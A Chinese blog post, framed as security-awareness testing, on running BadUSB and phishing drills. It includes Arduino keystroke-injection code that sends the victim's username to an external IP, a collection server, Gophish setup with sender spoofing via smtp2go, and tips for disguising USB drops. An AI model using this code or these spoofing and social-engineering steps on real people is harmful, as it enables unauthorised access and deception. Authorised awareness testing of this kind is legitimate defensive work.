<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="ShangZeng">





<title>钓鱼邮件/网站+BADUSB测试部署 | ShangZeng</title>



    <link rel="icon" href="/favicon.ico">




    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        <!-- MathJax配置，可通过单美元符号书写行内公式等 -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Config({
    "HTML-CSS": {
        preferredFont: "TeX",
        availableFonts: ["STIX","TeX"],
        linebreaks: { automatic:true },
        EqnChunk: (MathJax.Hub.Browser.isMobile ? 10 : 50)
    },
    tex2jax: {
        inlineMath: [ ["$", "$"], ["\\(","\\)"] ],
        processEscapes: true,
        ignoreClass: "tex2jax_ignore|dno",
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    },
    TeX: {
        equationNumbers: { autoNumber: "AMS" },
        noUndefined: { attributes: { mathcolor: "red", mathbackground: "#FFEEEE", mathsize: "90%" } },
        Macros: { href: "{}" }
    },
    messageStyle: "none"
    });
</script>
<!-- 给MathJax元素添加has-jax class -->
<script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for(i=0; i < all.length; i += 1) {
            all[i].SourceElement().parentNode.className += ' has-jax';
        }
    });
</script>
<!-- 通过连接CDN加载MathJax的js代码 -->
<script type="text/javascript" async
        src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML">
</script>


    


<meta name="generator" content="Hexo 4.2.0"></head>
<body>
    <div class="wrapper">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">ShangZeng&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/friends">Friends</a>
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>

        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">ShangZeng&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">&#9776; Menu</div>
            </div>
            <div class="menu" id="mobile-menu">
                
                    <a class="menu-item" href="/archives">Posts</a>
                
                    <a class="menu-item" href="/category">Categories</a>
                
                    <a class="menu-item" href="/tag">Tags</a>
                
                    <a class="menu-item" href="/about">About</a>
                
                    <a class="menu-item" href="/friends">Friends</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if(toggleMenu.classList.contains("active")){
           toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        }else{
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
        <div class="main">
            <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    document.ready(
        function () {
            tocbot.init({
                tocSelector: '.tocbot-list',
                contentSelector: '.post-content',
                headingSelector: 'h1, h2, h3, h4, h5',
                collapseDepth: 1,
                orderedList: false,
                scrollSmooth: true,
            })
        }
    )

    function expand_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 6,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "collapse_toc()");
        b.innerHTML = "Collapse all"
    }

    function collapse_toc() {
        var b = document.querySelector(".tocbot-toc-expand");
        tocbot.init({
            tocSelector: '.tocbot-list',
            contentSelector: '.post-content',
            headingSelector: 'h1, h2, h3, h4, h5',
            collapseDepth: 1,
            orderedList: false,
            scrollSmooth: true,
        });
        b.setAttribute("onclick", "expand_toc()");
        b.innerHTML = "Expand all"
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">钓鱼邮件/网站+BADUSB测试部署</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">ShangZeng</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">July 13, 2020&nbsp;&nbsp;14:24:31</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/other/">other</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h3 id="背景"><a href="#背景" class="headerlink" title="背景"></a>背景</h3><p>用于企业安全意识培训，或者HW前安全准备。从目前的到的效果来看，大部分员工都是“铁憨憨”。</p>
<h3 id="BADUSB测试部署"><a href="#BADUSB测试部署" class="headerlink" title="BADUSB测试部署"></a>BADUSB测试部署</h3><p><strong>什么是 badusb</strong></p>
<p>攻击者在定制攻击设备时，会向USB设备中置入一个攻击芯片，此攻击芯片是一个非常小而且功能完整的单片机开发系统，它的名字叫TEENSY。通过TEENSY你可以模拟出一个键盘和鼠标，当你插入这个定制的USB设备时，电脑会识别为一个键盘，利用设备中的微处理器与存储空间和编程进去的攻击代码，就可以向主机发送控制命令，从而完全控制主机，无论自动播放是否开启，都可以成功。</p>
<h4 id="购买硬件"><a href="#购买硬件" class="headerlink" title="购买硬件"></a>购买硬件</h4><p>首先去某宝买BADUSB，一般分两种，这里用的第一种：</p>
<ol>
<li>自带几十KB内存，价格20-50 （简单测试基本够用）</li>
<li>自带Wi-Fi模块，价格200-1500 （灵活性高但是容易坏）</li>
</ol>
<h4 id="下载软件"><a href="#下载软件" class="headerlink" title="下载软件"></a>下载软件</h4><p>Arduino是一款便捷灵活、方便上手的开源电子原型平台。 它构建于开放原始码simple I/O介面版，并且具有使用类似Java、C语言的Processing/Wiring开发环境。主要包含两个主要的部分：硬件部分是可以用来做电路连接的Arduino电路板；另外一个则是Arduino IDE，你的计算机中的程序开发环境。你只要在IDE中编写程序代码，将程序上传到Arduino电路板后，程序便会告诉Arduino电路板要做些什么了。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">国内下载地址： https:&#x2F;&#x2F;www.arduino.cn&#x2F;thread-5838-1-1.html</span><br><span class="line">国外下载    ： https:&#x2F;&#x2F;www.arduino.cc&#x2F;en&#x2F;Guide&#x2F;HomePage</span><br></pre></td></tr></table></figure>


<h4 id="进行烧录-服务端搭建"><a href="#进行烧录-服务端搭建" class="headerlink" title="进行烧录 - 服务端搭建"></a>进行烧录 - 服务端搭建</h4><p>这里仅仅是进行演练测试，因此也不需要弹个shell这么麻烦，获取主机用户名，IP，和插入BADUSB的时间就足够了。因此这里的方案是首先在内/外网中搭建一个服务器，在BADUSB中写入代码，插入U盘后进行访问目标服务器就行了。</p>
<p>首先我们需要服务器器代码，这里可以使用python开启测试网站</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m SimpleHTTPServer 8000</span><br></pre></td></tr></table></figure>

<p>如果需求多变，那就自己搭建一个服务，这里是用golang写的：</p>
<figure class="highlight golang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> main</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> (</span><br><span class="line">	<span class="string">"log"</span></span><br><span class="line">	<span class="string">"os"</span></span><br><span class="line">	<span class="string">"net/http"</span></span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">badusbtest</span><span class="params">(w http.ResponseWriter, r *http.Request)</span></span> &#123;</span><br><span class="line">	log.Println(r.URL.Query().Get(<span class="string">"name"</span>),r.RemoteAddr)</span><br><span class="line">	tracefile(r.URL.Query().Get(<span class="string">"name"</span>)+<span class="string">"  "</span>+r.RemoteAddr+<span class="string">"\n"</span>,<span class="string">"result.txt"</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">main</span><span class="params">()</span></span> &#123;</span><br><span class="line">	http.HandleFunc(<span class="string">"/badusbtest"</span>, badusbtest)</span><br><span class="line">	http.ListenAndServe(<span class="string">":8000"</span>, <span class="literal">nil</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">tracefile</span><span class="params">(str_content,savename <span class="keyword">string</span>)</span></span>  &#123;</span><br><span class="line">    fd,_:=os.OpenFile(savename,os.O_RDWR|os.O_CREATE|os.O_APPEND,<span class="number">0644</span>)</span><br><span class="line">    fd_content:=str_content</span><br><span class="line">    buf:=[]<span class="keyword">byte</span>(fd_content)</span><br><span class="line">    fd.Write(buf)</span><br><span class="line">    fd.Close()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h4 id="进行烧录-代码烧录"><a href="#进行烧录-代码烧录" class="headerlink" title="进行烧录 - 代码烧录"></a>进行烧录 - 代码烧录</h4><p>在烧录前，需要在 选项 -&gt; 端口 中插件是否是要烧录的硬件，点击上传，显示烧录成功，烧录成功后会在目标机器上面执行一次。</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG779.png" alt="image"></p>
<p>Arduino 语言基于C++ ， 难度不大，网上有教程。我这里给出网上修改的代码：</p>
<figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;Keyboard.h&gt; //包含键盘模块头文件</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span></span>&#123; <span class="comment">//初始化</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">begin</span>();<span class="comment">//开始键盘通信</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">500</span>);<span class="comment">//延时1000毫秒，不要太短，因为每天电脑的运行速度都不一样 </span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(KEY_CAPS_LOCK); <span class="comment">//按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(KEY_CAPS_LOCK); <span class="comment">//释放大写键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(KEY_LEFT_GUI);<span class="comment">//按下徽标键 也就是win键 </span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>); </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(<span class="string">'r'</span>);<span class="comment">//按下r键 </span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>); </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(KEY_LEFT_GUI);<span class="comment">//松掉win键 </span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(<span class="string">'r'</span>);<span class="comment">//松掉r键 </span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>); </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">println</span>(<span class="string">"cmd"</span>);<span class="comment">//输入cmd进入DOS</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>); </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(KEY_RETURN);  <span class="comment">//按下回车键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(KEY_RETURN); <span class="comment">//释放回车键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>); </span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">println</span>(<span class="string">"start http://121.36.140.230:8000/badusbtest?name=%username%"</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(KEY_RETURN);  <span class="comment">//按下回车键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(KEY_RETURN); <span class="comment">//释放回车键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">press</span>(KEY_CAPS_LOCK); <span class="comment">//按下大写键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">release</span>(KEY_CAPS_LOCK); <span class="comment">//释放大写键 我们再次关闭开启的大写键</span></span><br><span class="line">    </span><br><span class="line">    <span class="built_in">delay</span>(<span class="number">250</span>);</span><br><span class="line">    </span><br><span class="line">    <span class="built_in">Keyboard</span>.<span class="built_in">end</span>();<span class="comment">//结束键盘通讯 </span></span><br><span class="line"></span><br><span class="line">&#125; </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span><span class="comment">//循环，这里的代码</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"></span>&#123; </span><br><span class="line"></span><br><span class="line"><span class="comment">//循环体 写入你要循环的代码   </span></span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>到这里基本就完事了，接下来就是撒盘的操作了，在撒盘的时候，请注意以下几点：</p>
<ol>
<li>每个U盘最好做好伪装，比如背面写上持有人名字，套壳等等。</li>
<li>熟练社工，自己拿着U盘去碰瓷的效果比仍在地上等人捡效果好。</li>
<li>注意回收，能要回来就要回来（尤其是HW），小心二次传播。</li>
</ol>
<h3 id="钓鱼邮件测试部署"><a href="#钓鱼邮件测试部署" class="headerlink" title="钓鱼邮件测试部署"></a>钓鱼邮件测试部署</h3><h4 id="Gophish-安装"><a href="#Gophish-安装" class="headerlink" title="Gophish 安装"></a>Gophish 安装</h4><p>Gophish 是一个功能强大的开源网络钓🐟框架。</p>
<p><strong>1.下载源码安装</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 下载 linux 源码</span></span><br><span class="line">wget https://github.com/gophish/gophish/releases/download/v0.10.1/gophish-v0.10.1-linux-64bit.zip</span><br><span class="line"><span class="comment"># 安装解压软件</span></span><br><span class="line">sudo apt-get install unzip</span><br><span class="line"><span class="comment"># 解压文件</span></span><br><span class="line">unzip gophish-v0.10.1-linux-64bit.zip.zip</span><br><span class="line"><span class="comment"># 启动</span></span><br><span class="line">chmod 777 gophish  </span><br><span class="line">sudo ./gophish</span><br></pre></td></tr></table></figure>

<p>如果是在VPS上配置，记得打开安全策略组（端口放行）；端口修改在config.json中进行，最好修改成本地：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">...</span><br><span class="line">&quot;admin_server&quot;: &#123;</span><br><span class="line">	&quot;listen_url&quot;: &quot;0.0.0.0:8888&quot;,</span><br><span class="line">	&quot;use_tls&quot;: true,</span><br><span class="line">	&quot;cert_path&quot;: &quot;gophish_admin.crt&quot;,</span><br><span class="line">	&quot;key_path&quot;: &quot;gophish_admin.key&quot;</span><br><span class="line">&#125;,</span><br><span class="line">&quot;phish_server&quot;: &#123;</span><br><span class="line">	&quot;listen_url&quot;: &quot;0.0.0.0:88&quot;,</span><br><span class="line">	&quot;use_tls&quot;: false,</span><br><span class="line">	&quot;cert_path&quot;: &quot;example.crt&quot;,</span><br><span class="line">	&quot;key_path&quot;: &quot;example.key&quot;</span><br><span class="line">&#125;,</span><br><span class="line">...</span><br></pre></td></tr></table></figure>


<p><strong>2.倒入安装</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 导入tar包</span><br><span class="line">dockerload&lt;phishing-email.tar</span><br><span class="line"># 启动容器（注意安全组、防火墙开放情况）</span><br><span class="line">dockerrun--name&#x3D;email_phish-itdp8080:8080-p3333:3333-p8443:8443phishing-email:1.0</span><br></pre></td></tr></table></figure>

<p><strong>3.使用docker安装</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># 拉取镜像</span><br><span class="line">dockerpullgophish&#x2F;gophish</span><br><span class="line"># 启动容器（注意安全组、防火墙开放情况）</span><br><span class="line">dockerrun--name&#x3D;email_phish-itdp8080:8080-p3333:3333-p8443:8443docker.io&#x2F;gophish&#x2F;gophish</span><br></pre></td></tr></table></figure>




<p><strong>登陆配置</strong></p>
<p>默认账号密码 admin gophish，登陆后界面如下：</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG780.png" alt="image"></p>
<h4 id="邮件发送配置"><a href="#邮件发送配置" class="headerlink" title="邮件发送配置"></a>邮件发送配置</h4><p>目前常见的方式如下,下面使用的方式为第二条：</p>
<ol>
<li>购买一个相似的域名，搭建邮件服务器 - <a href="https://sg.godaddy.com/zh" target="_blank" rel="noopener">GoDaddy</a></li>
<li>用于转发进行域名伪造（防治被拒收）：<a href="https://app.smtp2go.com/" target="_blank" rel="noopener">smtp2go</a></li>
</ol>
<p><strong>smtp2go</strong></p>
<p>由于我们自己的服务器可信度过低，伪造发件人地址会被拦截。可以借助smtp2go进行发信，smtp2go主要是相当于邮件托管，可以分发子账户进行发送（有时候账号会封，勤换）。（邮箱注册）普通账户可以免费发1000封邮件。登陆后注册SMTP账户</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG781.png" alt="image"></p>
<p>在注册smtp2go账户后，再注册SMTP账户后，将生成的用户密码写入gophish的 Sending Profiles 中，这里注意要进行填写Email头信息：</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG782.png" alt="image"></p>
<p>发送测试邮件，发现已经伪造成功了。</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG9056.png" alt="image"></p>
<h4 id="Gophish-其他功能"><a href="#Gophish-其他功能" class="headerlink" title="Gophish 其他功能"></a>Gophish 其他功能</h4><p>主要的就是以上，再就是一些详细配置，看参考资料就行了。</p>
<p><img src="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/WechatIMG783.png" alt="image"></p>
<h3 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h3><p><a href="http://blog.leanote.com/post/snowming/a6b66097bccd" target="_blank" rel="noopener">gophish+自己搭建邮件服务器</a></p>
<p><a href="https://saucer-man.com/information_security/452.html" target="_blank" rel="noopener">邮件伪造原理和实践</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>ShangZeng</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/">https://www.shangzeng.club/2020/07/13/%E9%92%93%E9%B1%BC-BADUSB%E6%B5%8B%E8%AF%95%E9%83%A8%E7%BD%B2/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2020 <a href="http://creativecommons.org/licenses/by-nc/4.0/" target="_blank" rel="noopener">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>Do you believe in <strong>DESTINY<strong>?</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/other/"># other</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2020/07/13/winhex%E4%B9%8B%E4%BB%8E%E6%95%B0%E6%8D%AE%E6%81%A2%E5%A4%8D%E5%88%B0%E5%88%A0%E7%9B%98%E8%B7%91%E8%B7%AF/">winhex之从数据恢复到删盘跑路</a>
            
            
            <a class="next" rel="next" href="/2020/01/16/RGCMS%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">RGCMS代码审计</a>
            
        </section>


    </article>
</div>

        </div>
        <footer id="footer" class="footer">
    <div class="copyright">
        <span>© ShangZeng | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>
</html>
